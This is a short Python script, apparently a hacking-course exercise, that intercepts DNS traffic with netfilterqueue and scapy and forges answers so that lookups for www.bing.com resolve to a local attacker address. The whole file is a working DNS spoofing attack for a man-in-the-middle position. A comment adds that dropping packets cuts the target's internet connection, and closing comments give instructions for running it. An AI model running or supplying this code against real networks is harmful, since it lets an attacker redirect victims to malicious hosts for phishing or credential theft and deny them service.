#!usr/bin/env python
import netfilterqueue
import scapy.all as scapy
def call_back(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if "www.bing.com" in str(qname):
            print("[+] spoofing target")
            answer = scapy.DNSRR(rrname=qname, rdata="192.168.235.153")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len

            packet.set_payload(bytes(scapy_packet))
        # print(scapy_packet.show())
    # print(packet.get_payload())

    packet.accept()
    # packet.drop() === to cut internet connection for target


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, call_back)
queue.run()
# tor run this type ping -c 1 www.bing.com in one terminal
# and python3 (filename)

